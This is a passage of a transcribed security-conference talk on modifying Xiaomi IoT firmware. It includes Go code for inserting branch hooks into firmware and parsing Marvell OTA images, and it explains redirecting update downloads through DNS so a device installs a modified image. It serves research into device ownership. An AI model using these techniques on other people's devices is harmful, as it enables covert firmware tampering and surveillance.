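	imm := s<<24 | i1<<23 | i2<<22 | (hw1&0x3ff)<<12 | (hw2&0x7ff)<<1
	off := int32(imm<<7) >> 7 // sign-extend the 25-bit offset
	return at + 4 + uint32(off), hw2&0x4000 != 0, nil
}

// image is a firmware segment as it sits in memory (base = its load address).
type image struct {
	base uint32
	data []byte
}

// hook overwrites the 4 bytes at 'at' with a branch to 'target'. The clobbered
// bytes (one 32-bit or two 16-bit instructions) are returned, because the patch
// code has to redo that work before it jumps back.
func (im *image) hook(at, target uint32, link bool) ([]byte, error) {
	if at < im.base || at+4 > im.base+uint32(len(im.data)) {
		return nil, fmt.Errorf("0x%x is not inside the image", at)
	}
	insn, err := encodeBranch(at, target, link)
	if err != nil {
		return nil, err
	}
	off := at - im.base
	old := append([]byte(nil), im.data[off:off+4]...)
	copy(im.data[off:], insn)
	return old, nil
}

func main() {
	// Constructed image: 64 KiB of zeroed "code" at an address in the 0x1f000000 XIP window (assumption).
	im := &image{base: 0x1f003718, data: make([]byte, 0x10000)}
	old, err := im.hook(0x1f004000, 0x1f00f000, true)
	target, link, _ := decodeBranch(0x1f004000, im.data[0x1f004000-im.base:])
	fmt.Printf("replaced % x with bl -> 0x%x (link=%v, err=%v)\n", old, target, link, err)
}
```

Two practical notes: the same source bytes placed at a different address decode to a different target, which is why "handle different firmware versions" on the slide is a real cost, and a BL that already calls an existing function can be retargeted at a C wrapper that receives the original arguments, which is the cheapest way to "use existing functions".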
Binary Patching: Nexmon Framework
definitions.mk (screenshot)
Prerequisite: know the memory layout
(diagram, slides 110–112: original code, the branch out of it, and the patch code)
113ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Nexmon Framework
wrapper.c
Prerequisite: Know function names and signature
Getting the function names:
1. Compile an SDK example project with debug symbols
2. Load the stripped device binary into IDA
3. Use BinDiff to transfer the function names from the symbolised build to the device binary
Putting it all together: write your patch code in C (patch.c, screenshot)
(diagram, slides 115–117: the branch in the original code now targets the patch code)
Preparing the modified binary (Marvell)
• A preliminary approach for the lightbulbs' SPI flash image was done by Uri Shaked*
• But the SPI format != the OTA format
• Dennis wrote a script for that (and for the Mediatek OTA format) ☺
* https://hackernoon.com/inside-the-bulb-adventures-in-reverse-engineering-smart-bulb-firmware-1b81ce2694a6

Marvell OTA image header, little-endian: a 20-byte file header followed by one 20-byte descriptor per segment.

| Offset | Bytes (hex) | Field | Value |
|---|---|---|---|
| 0x00 | 4D 52 56 4C | magic | "MRVL" |
| 0x04 | 7B F1 9C 2E | magic | 0x2e9cf17b |
| 0x08 | FF BE A8 59 | timestamp | 0x59a8beff |
| 0x0C | 03 00 00 00 | # of segments | 3 |
| 0x10 | 19 37 00 1F | entry address | 0x1f003719 |

| Descriptor at | segment magic | offset in file | size of segment | mem addr | checksum (hex bytes) |
|---|---|---|---|---|---|
| 0x14 | 02 00 00 00 | 0xc8 | 0x3650 | 0x00100000 | 20 C8 51 7D |
| 0x28 | 02 00 00 00 | 0x3718 | 0x81528 | 0x1f003718 | 0A 11 25 85 |
| 0x3C | 02 00 00 00 | 0x84c40 | 0x1954 | 0x20000040 | FB 5F ED 39 |

The segments are stored back to back (0xc8 + 0x3650 = 0x3718 and 0x3718 + 0x81528 = 0x84c40), and the entry address is the second segment's load address plus one, i.e. a Thumb-mode entry into the XIP code at 0x1f003718.
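A parser for the header shown above, added here as a Go example of mine (it is neither Dennis's script nor Marvell's tooling). The field meanings are those of the table; the slide does not say how the per-segment checksum is computed, so the parser carries that field without verifying it, and the upper bound of 16 segments is a sanity limit I chose. The sample input is the 0x50 header bytes from the slide.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// Layout from the slide: 20-byte file header, then one 20-byte descriptor per
// segment, everything little-endian. The checksum algorithm is not given on the
// slide, so the field is parsed but not checked.
const (
	hdrLen   = 20
	segLen   = 20
	segMagic = 2
)

type segment struct {
	FileOffset, Size, LoadAddr, Checksum uint32
}

type mrvlImage struct {
	Magic2, Timestamp, Entry uint32
	Segments                 []segment
}

func parseMRVL(b []byte) (*mrvlImage, error) {
	if len(b) < hdrLen || string(b[:4]) != "MRVL" {
		return nil, errors.New("missing MRVL magic")
	}
	n := binary.LittleEndian.Uint32(b[12:])
	if n == 0 || n > 16 || len(b) < hdrLen+int(n)*segLen { // 16 is a sanity limit of ours
		return nil, fmt.Errorf("implausible segment count %d for %d bytes", n, len(b))
	}
	img := &mrvlImage{
		Magic2:    binary.LittleEndian.Uint32(b[4:]),
		Timestamp: binary.LittleEndian.Uint32(b[8:]),
		Entry:     binary.LittleEndian.Uint32(b[16:]),
	}
	for i := 0; i < int(n); i++ {
		d := b[hdrLen+i*segLen:]
		if binary.LittleEndian.Uint32(d) != segMagic {
			return nil, fmt.Errorf("segment %d: bad magic", i)
		}
		img.Segments = append(img.Segments, segment{
			FileOffset: binary.LittleEndian.Uint32(d[4:]),
			Size:       binary.LittleEndian.Uint32(d[8:]),
			LoadAddr:   binary.LittleEndian.Uint32(d[12:]),
			Checksum:   binary.LittleEndian.Uint32(d[16:]),
		})
	}
	return img, nil
}

// validate checks that every segment lies inside a file of fileLen bytes and
// that the entry point (Thumb bit set) falls into one of the segments.
func (img *mrvlImage) validate(fileLen int) error {
	for i, s := range img.Segments {
		if end := uint64(s.FileOffset) + uint64(s.Size); end > uint64(fileLen) {
			return fmt.Errorf("segment %d ends at 0x%x, beyond the file (0x%x)", i, end, fileLen)
		}
	}
	if img.Entry&1 == 0 {
		return errors.New("entry address lacks the Thumb bit")
	}
	if _, err := img.fileOffset(img.Entry &^ 1); err != nil {
		return fmt.Errorf("entry 0x%x: %v", img.Entry, err)
	}
	return nil
}

// fileOffset maps a memory address to its position in the OTA file: a patch
// targets a memory address, but the bytes have to be written into the file.
func (img *mrvlImage) fileOffset(addr uint32) (uint32, error) {
	for _, s := range img.Segments {
		if addr >= s.LoadAddr && addr < s.LoadAddr+s.Size {
			return s.FileOffset + (addr - s.LoadAddr), nil
		}
	}
	return 0, fmt.Errorf("0x%x is not covered by any segment", addr)
}

// slideHeader is the 0x50 header bytes from the slide.
var slideHeader = []byte{
	0x4D, 0x52, 0x56, 0x4C, 0x7B, 0xF1, 0x9C, 0x2E, 0xFF, 0xBE, 0xA8, 0x59, 0x03, 0x00, 0x00, 0x00, 0x19, 0x37, 0x00, 0x1F,
	0x02, 0x00, 0x00, 0x00, 0xC8, 0x00, 0x00, 0x00, 0x50, 0x36, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x20, 0xC8, 0x51, 0x7D,
	0x02, 0x00, 0x00, 0x00, 0x18, 0x37, 0x00, 0x00, 0x28, 0x15, 0x08, 0x00, 0x18, 0x37, 0x00, 0x1F, 0x0A, 0x11, 0x25, 0x85,
	0x02, 0x00, 0x00, 0x00, 0x40, 0x4C, 0x08, 0x00, 0x54, 0x19, 0x00, 0x00, 0x40, 0x00, 0x00, 0x20, 0xFB, 0x5F, 0xED, 0x39,
}

func main() {
	img, err := parseMRVL(slideHeader)
	if err != nil {
		panic(err)
	}
	fmt.Printf("entry 0x%08x, timestamp 0x%08x, %d segments\n", img.Entry, img.Timestamp, len(img.Segments))
	for i, s := range img.Segments {
		fmt.Printf("  seg %d: file 0x%06x+0x%06x -> mem 0x%08x (checksum 0x%08x)\n", i, s.FileOffset, s.Size, s.LoadAddr, s.Checksum)
	}
	// If nothing follows the last segment, the file is 0x84c40 + 0x1954 = 0x86594 bytes long.
	fmt.Println("validate:", img.validate(0x86594))
}
```

Run on the slide's header it reports the three contiguous segments and confirms that 0x1f003719 is the Thumb-mode start of the segment loaded at 0x1f003718; feeding it a truncated file length or a damaged magic makes the respective check fail, which is what you want before flashing a rebuilt image.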
Applying the modified firmware (diagram, slides 120–131): in the normal flow the Xiaomi Cloud tells the device about an update and the device fetches it from the Xiaomi CDN. The download location is resolved through DNS, so a DNS record that points the CDN hostname at our own "Hillbilly" CDN makes the device fetch the modified image from there instead.
![Page 132: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/132.jpg)
132 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Proxy cloud communication
[Diagram: device and app cloud traffic proxied through Dustcloud]
• Cloud endpoints: ot.io.mi.com:80 (tcp), ott.io.mi.com:8053 (udp)
• Message forms: IPC plain json (tcp); enc(key) json (tcp/udp); enc(token) json (udp)
• Android/iPhone App
• DNS records: 130.83.x.x ot.io.mi.com (listed twice in the diagram)
• Dustcloud <- commands, reports ->
134 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Other Possible Modifications
• Marvell 88MW30x SDK WiFi sample apps
– p2p_demo
– raw_p2p_demo
– wlan_frame_inject_demo
– wlan_sniffer
135 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
One word of warning…
• Never leave your devices unprovisioned
– Someone else can provision it for you
• Install malicious firmware
• Snoop on your apartment
• Be careful with used devices
– e.g. Amazon Marketplace
– Some malicious software may be installed
136 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Acknowledgements & FAQ
• Secure Mobile Networking (SEEMOO) Labs and CROSSING S1
• Prof. Guevara Noubir (CCIS, Northeastern University)
www.dontvacuum.me
*Will be updated after the ReCon ;)
137 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Final remarks
• I (Dennis) want to personally thank the “Studienstiftung des deutschen Volkes” (SDV) for their scholarship and support for my graduate study. Without them I probably would not have had time to do this research.
• This research was not financed by Xiaomi or any competitor. The research was funded by my private funds and was done in our free time.
138 ReCon BRX 2018 – Dennis Giese, Daniel Wegemer